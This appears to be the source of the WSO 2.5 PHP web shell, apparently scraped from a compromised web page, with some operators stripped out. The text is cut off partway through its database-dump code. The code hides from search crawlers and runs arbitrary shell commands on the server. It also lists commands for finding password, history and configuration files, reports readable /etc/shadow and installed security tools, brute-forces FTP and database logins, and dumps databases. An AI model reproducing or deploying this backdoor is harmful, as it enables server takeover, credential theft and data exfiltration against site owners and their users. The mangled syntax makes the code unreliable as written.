Войти в почту

?php $auth_pass = "63a9f0ea7bb98050796b649e85481845"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('WSO_VERSION', '2.5'); if(get_magic_quotes_gpc()) { function WSOstripslashes($array) { return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); } $_POST = WSOstripslashes($_POST); $_COOKIE = WSOstripslashes($_COOKIE); } function wsoLogin() { die(" Password: "); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST['pass']) (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find config.php in current dir" => "dir /s /w /b config.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config\"", "find config files in current dir" => "find . -type f -name \"config\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo "" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ." body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: $color !important; } span{ font-weight: bolder; } h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "'; var a_ = '" . htmlspecialchars(@$_POST['a']) ."' var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."'; var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."'; var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."'; var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."'; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i Read file Make dir:$is_writable Make file:$is_writable Execute Upload file:$is_writable "; } if (!function_exists("posix_getpwuid") (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if (is_int($s)) $s = sprintf("%u", $s); if($s = 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s = 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s = 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p 0xC000) == 0xC000)$i = 's'; elseif (($p 0xA000) == 0xA000)$i = 'l'; elseif (($p 0x8000) == 0x8000)$i = '-'; elseif (($p 0x6000) == 0x6000)$i = 'b'; elseif (($p 0x4000) == 0x4000)$i = 'd'; elseif (($p 0x2000) == 0x2000)$i = 'c'; elseif (($p 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p 0x0100) ? 'r' : '-'); $i .= (($p 0x0080) ? 'w' : '-'); $i .= (($p 0x0040) ? (($p 0x0800) ? 's' : 'x' ) : (($p 0x0800) ? 'S' : '-')); $i .= (($p 0x0020) ? 'r' : '-'); $i .= (($p 0x0010) ? 'w' : '-'); $i .= (($p 0x0008) ? (($p 0x0400) ? 's' : 'x' ) : (($p 0x0400) ? 'S' : '-')); $i .= (($p 0x0004) ? 'r' : '-'); $i .= (($p 0x0002) ? 'w' : '-'); $i .= (($p 0x0001) ? (($p 0x0200) ? 't' : 'x' ) : (($p 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; else return '' . wsoPerms(@fileperms($f)) . ''; } function wsoScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo ' Server security information '; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, "\n") === false) echo $v . ''; else echo '' . $v . ''; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; wsoSecParam('Supported databases', implode(', ', $temp)); echo ''; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo ''; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo ''; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); echo 'posix_getpwuid ("Read" /etc/passwd)FromTo'; if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { $temp = ""; for(;$_POST['p2'] $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1); } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach($files as $f) { echo ''.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '>[ ' . htmlspecialchars($f['name']) . ' ]').''.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.$f['perms'] .'R T'.(($f['type']=='file')?' E D':'').''; $l = $l?0:1; } echo " CopyMoveDelete"; if(class_exists('ZipArchive')) echo "Compress (zip)Uncompress (zip)"; echo "Compress (tar.gz)"; if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "Paste / Compress"; echo " "; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: "; echo " "; wsoFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST'p1'; $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax']) !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo ' String conversions '; echo ""; foreach($stringTools as $k => $v) echo "".$k.""; echo " send using AJAX".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2'])).""; if(!empty($_POST['p1'])) { if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); } echo" Search files Text Path Name "; function wsoRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) wsoRecursiveGlob($item); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) echo "".htmlspecialchars($item).""; } } } } if(@$_POST['p3']) wsoRecursiveGlob($_POST['c']); echo " Search for hash "; wsoFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } wsoHeader(); echo ' File tools '; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo 'Name: '.htmlspecialchars(@basename($_POST['p1'])).' Size: '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' Permission: '.wsoPermsColor($_POST['p1']).' Owner/Group: '.$uid['name'].'/'.$gid['name'].''; echo 'Change time: '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' Access time: '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' Modify time: '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).''; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo ''.((strtolower($v)==@$_POST['p2'])?'[ '.$v.' ]':$v).' '; echo ''; switch($_POST['p2']) { case 'view' echo ''; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo ''; break; case 'highlight' if( @is_readable($_POST['p1']) ) { echo ''; $code = @highlight_file($_POST['p1'],true); echo str_replace(array(''; break; case 'hexdump' $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000','',''); $len = strlen($c); for ($i=0; $i'; break; case 'touch' if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo 'p3_="";'; break; } echo ' '; wsoFooter(); } function actionConsole() { if(!empty($_POST['p1']) !empty($_POST['p2'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2> 1'; } elseif(!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo d.cf.cmd.value='';\n ; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes( \n$ .$_POST['p1']. \n .wsoEx($_POST['p1']), \n\r\t\\'\0 )); if(preg_match( !.*cd\s+([^;]+)$! ,$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo c_=' .$GLOBALS['cwd']. '; ; } } echo d.cf.output.value+=' .$temp. '; ; echo d.cf.output.scrollTop = d.cf.output.scrollHeight; ; $temp = ob_get_clean(); echo strlen($temp), \n , $temp; exit; } if(empty($_POST['ajax']) !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo script if(window.Event) window.captureEvents(Event.KEYDOWN); var cmds = new Array(''); var cur = 0; function kp(e) { var n = (window.Event) ? e.which : e.keyCode; if(n == 38) { cur--; if(cur>=0) document.cf.cmd.value = cmds[cur]; else cur++; } else if(n == 40) { cur++; if(cur cmds.length) document.cf.cmd.value = cmds[cur]; else cur--; } } function add(cmd) { cmds.pop(); cmds.push(cmd); cmds.push(''); cur = cmds.length-1; } "; echo ' Console '; foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo ''; continue; } echo ''.$n.''; } echo ' send using AJAX redirect stderr to stdout (2>&1)'; if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1'])); } echo '$'; echo ' d.cf.cmd.focus();'; wsoFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') wsoHeader(); echo ' h1 Suicide /h1 div class=content Really want to remove the shell? br a href=# onclick= g(null,null,\'yes\') Yes /a /div '; wsoFooter(); } function actionBruteforce() { wsoHeader(); if( isset($_POST['proto']) ) { echo ' Results Type: '.htmlspecialchars($_POST['proto']).' Server: '.htmlspecialchars($_POST['server']).''; if( $_POST['proto'] == 'ftp' ) { function wsoBruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.($port?$port:3306), $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($line[0]).''; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo ''.htmlspecialchars($line[0]).':'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo ''.htmlspecialchars($_POST['login']).':'.htmlspecialchars($line).''; } } } echo "Attempts: $attempts Success: $success "; } echo ' Bruteforce Type' .'FTPMySqlPostgreSql' .'' .'' .'' .'Server:port' .'' .'Brute type' .' /etc/passwd' .' reverse (login -> nigol)' .' Dictionary' .'Login' .'' .'Dictionary' .'' .''; echo ' '; wsoFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql' if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql' $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql' if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql' return $this->res = @mysql_query($str); break; case 'pgsql' return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql' return @mysql_fetch_assoc($res); break; case 'pgsql' return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql' return $this->query("SHOW databases"); break; case 'pgsql' return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql' return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql' return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql' return @mysql_error(); break; case 'pgsql' return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql' if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql' return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql' return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql' $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql' $res = $this->query('SHOW CREATE TABLE '.$table.''); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM '.$table.''); $i = 0; $head = true; while($item = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } $columns = array(); foreach($item as $k= $v) { if($v === null) $item[$k] = NULL ; elseif(is_int($v)) $item[$k] = $v; else $item[$k] = ' .@mysql_real_escape_string($v). ' ; $columns[] = ` .$k. ` ; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode( , , $columns). ) VALUES \n\t( .implode( , , $item).')'; $head = false; } else $sql .= \n\t,( .implode( , , $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ;\n\n ); else echo( ;\n\n ); break; case 'pgsql' $this- query('SELECT * FROM '.$table); while($item = $this- fetch()) { $columns = array(); foreach($item as $k= $v) { $item[$k] = ' .addslashes($v). ' ; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode( , , $columns).') VALUES ('.implode( , , $item).');'. \n ; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if((@$_POST['p2']=='download') (@$_POST['p1']!='select')) { $db- connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db- selectdb($_POST['sql_base']); switch($_POST['charset']) { case Windows-1251 : $db- setCharset('cp1251'); break; case UTF-8 : $db- setCharset('utf8'); break; case KOI8-R : $db- setCharset('koi8r'); break; case KOI8-U : $db- setCharset('koi8u'); break; case cp866 : $db- setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start( ob_gzhandler , 4096); header( Content-Disposition: attachment; filename=dump.sql ); header( Content-Type: text/plain ); foreach($_POST['tbl'] as $v) $db- dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db- dum